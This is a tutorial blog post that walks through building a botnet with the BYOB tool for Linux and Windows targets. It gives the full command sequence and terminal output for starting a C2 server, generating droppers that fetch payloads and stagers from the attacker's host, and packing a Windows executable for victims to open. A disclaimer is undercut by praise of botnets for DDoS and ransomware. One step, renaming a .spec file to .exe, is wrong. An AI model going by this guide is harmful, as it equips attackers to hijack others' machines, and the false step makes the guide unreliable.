Whenever it comes to performing a DDOS attack or creating a Ransomware, another question raises with it.
How to create your own Botnet army?
Creating a stable Botnet is not easy. Many experts sell botnet on the Darknet. Most of them do not work. If you buy Botnet from others your money may waste.
We never suggest you infect other’s devices, but we are going to demonstrate how we can create our own Botnet using a tool called BYOB. This demonstration will help you to prevent yourself from these types of attacks.
Let’s see how to use the BYOB.
Creating a Botnet For Linux Environment
Fire up your Kali Linux machine and download the BYOB tool from Github. After downloading navigate to the byob directory and again there will be a folder with the same name ‘byob’. Go there and execute the requirements text file.
It will satisfy all the requirements the tool needs to run.
git clone https://github.com/malwaredllc/byob.git cd byob/ cd byob/ pip install -r requirements.txt
Now start a botnet server to capture sessions.
python server.py --port 445
Here with the ‘–port’ argument you can assign a port to the botnet. We are using ‘445’, you can assign yours.
[email protected]:~/byob/byob# python server.py --port 445 88 88 88 88 88 88 88,dPPYba, 8b d8 ,adPPYba, 88,dPPYba, 88P' "8a `8b d8' a8" "8a 88P' "8a 88 d8 `8b d8' 8b d8 88 d8 88b, ,a8" `8b,d8' "8a, ,a8" 88b, ,a8" 8Y"Ybbd8"' Y88' `"YbbdP"' 8Y"Ybbd8"' d8' d8' [?] Hint: show usage information with the 'help' command [root @ /root/byob/byob]>
Now open another terminal and create the botnet by executing this command-
python client.py --name testbot.py 192.168.43.145 445
Here we’ve assigned the botnet name ‘testbot’ and the hostname is the local IP of the machine. You can use it over the Internet through port forwarding. We are just demonstrating it on our local network.
[email protected]:~/byob/byob# python client.py --name testbot.py 192.168.43.145 445 88 88 88 88 88 88 88,dPPYba, 8b d8 ,adPPYba, 88,dPPYba, 88P' "8a `8b d8' a8" "8a 88P' "8a 88 d8 `8b d8' 8b d8 88 d8 88b, ,a8" `8b,d8' "8a, ,a8" 88b, ,a8" 8Y"Ybbd8"' Y88' `"YbbdP"' 8Y"Ybbd8"' d8' d8' [>] Modules Adding modules... -(4 modules added to client) [>] Imports Adding imports... (31 imports from 4 modules) [>] Payload Uploading payload... -(hosting payload at: http://192.168.43.145:446//payloads/nb8.py) [>] Stager Uploading stager... -(hosting stager at: http://192.168.43.145:446//stagers/nb8.py) [>] Dropper Writing dropper... (342 bytes written to testbot.py)
The bot will be created in the ‘byob’ directory. Find ot and open it on the target device.
Executing The Botnet in The Target Linux Machine
If the target opens the Botnet with the command-
A new session will be opened in the server terminal. To see the session. Simply type ‘sessions‘ in the terminal.
[root @ /root/byob/byob]> [+] New Connection: 192.168.43.86 Session: 0 Started: Wed Feb 3 02:59:10 2021 [root @ /root/byob/byob]> sessions 0 username kevin administrator False sessions True uid e168345bf53ec9c31ba8ebed0c04a62e local_ip 127.0.1.1 online True joined 2021-02-03 02:59:15.334721 longitude 11.0078 last_online 2021-02-03 02:59:15.412509 public_ip 126.96.36.199 platform linux2 device parrot architecture 64 mac_address C2:96:BB:40:2: owner None latitude 49.5910 [root @ /root/byob/byob]>
As you can see in the session, the ‘Online‘ status is showing ‘True‘, which means the bot is executed properly in the target device.
To see all the options you can execute on the infected device. simply type ‘help’ in the server terminal.
Creating a Botnet For Windows Machines.
Now to create a Botnet for Windows machines you have to create a Botnet with the .EXE extension. To create it execute this command on a new terminal in the ‘byob/byob’ directory.
python client.py --name BotWindows.py --freeze
Here the ‘–freeze’ argument is used to create a .EXE file.
[email protected]:~/byob/byob# python client.py --name BotWindows 192.168.43.145 445 88 88 88 88 88 88 88,dPPYba, 8b d8 ,adPPYba, 88,dPPYba, 88P' "8a `8b d8' a8" "8a 88P' "8a 88 d8 `8b d8' 8b d8 88 d8 88b, ,a8" `8b,d8' "8a, ,a8" 88b, ,a8" 8Y"Ybbd8"' Y88' `"YbbdP"' 8Y"Ybbd8"' d8' d8' [>] Modules Adding modules... -(4 modules added to client) [>] Imports Adding imports...-(31 imports from 4 modules) [>] Payload Uploading payload... -(hosting payload at: http://192.168.43.145:446//payloads/mSC.py) [>] Stager Uploading stager... -(hosting stager at: http://192.168.43.145:446//stagers/mSC.py) [>] Dropper Writing dropper... (342 bytes written to BotWindows.py)
Go to the ‘byob’ directory. There you will find the Botnet named ‘BotWindows.py‘.
Executing the Botnet in a Windows Machine
Normally to run a python file on a Windows environment, you have to setup python for it on the target device. You can’t do that, right? But here we are going to apply a little trick.
We are going to use the ‘pyinstaller‘ to make the Botnet script executable. Open the directory where the BotWindows.py is present. Right-click and open the terminal there and apply this command.
pyinstaller --onefile BotWindows.py
[email protected]:~/byob/byob# pyinstaller --onefile BotWindows.py 237 INFO: PyInstaller: 3.6 238 INFO: Python: 2.7.17 258 INFO: Platform: Linux-5.3.0-kali2-amd64-x86_64-with-debian-kali-rolling 259 INFO: wrote /root/byob/byob/BotWindows.spec 347 INFO: UPX is available. 350 INFO: Extending PYTHONPATH with paths ['/root/byob', '/root/byob/byob'] 350 INFO: checking Analysis 351 INFO: Building Analysis because Analysis-00.toc is non existent 351 INFO: Initializing module dependency graph... 357 INFO: Caching module graph hooks... 424 INFO: Caching module dependency graph... 449 INFO: running Analysis Analysis-00.toc 580 INFO: Analyzing /root/byob/byob/BotWindows.py 3966 INFO: Processing module hooks... 3966 INFO: Loading module hook "hook-encodings.py"... 4763 INFO: Loading module hook "hook-httplib.py"... 4830 INFO: Looking for ctypes DLLs 4830 INFO: Analyzing run-time hooks ... 4837 INFO: Looking for dynamic libraries 5258 INFO: Looking for eggs 5258 INFO: Python library not in binary dependencies. Doing additional searching... 5498 INFO: Using Python library /lib/x86_64-linux-gnu/libpython2.7.so.1.0 5502 INFO: Warnings written to /root/byob/byob/build/BotWindows/warn-BotWindows.txt 5532 INFO: Graph cross-reference written to /root/byob/byob/build/BotWindows/xref-BotWindows.html 5594 INFO: checking PYZ 5594 INFO: Building PYZ because PYZ-00.toc is non existent 5595 INFO: Building PYZ (ZlibArchive) /root/byob/byob/build/BotWindows/PYZ-00.pyz 5825 INFO: Building PYZ (ZlibArchive) /root/byob/byob/build/BotWindows/PYZ-00.pyz completed successfully. 5859 INFO: checking PKG 5859 INFO: Building PKG because PKG-00.toc is non existent 5859 INFO: Building PKG (CArchive) PKG-00.pkg 8991 INFO: Building PKG (CArchive) PKG-00.pkg completed successfully. 8997 INFO: Bootloader /usr/local/lib/python2.7/dist-packages/PyInstaller/bootloader/Linux-64bit/run 8997 INFO: checking EXE 8998 INFO: Building EXE because EXE-00.toc is non existent 8998 INFO: Building EXE from EXE-00.toc 9031 INFO: Appending archive to ELF section in EXE /root/byob/byob/dist/BotWindows 9479 INFO: Building EXE from EXE-00.toc completed successfully.
This command will generate a new file with the name ‘BotWindows.spec‘. Rename ‘BotWindows.spec‘ with ‘BotWindows.exe‘.
Now, if the target opens the BotNet by simply clicking on it or on the command prompt with this command-
A new session will be opened on the server terminal. To see the session, type ‘sessions‘ on the terminal.
Botnets are the best thing to build an online army. With this army you can literally do anything on the Internet. Botnets are mostly used for DDOS attacks and Ransomware.
This script here is risk free and simple. If you are searching for other Botnet creators be careful while dealing with them. They can backfire sometimes.
What do you think about the BYOB tool? how are you going to use it? let us know in the comment box below.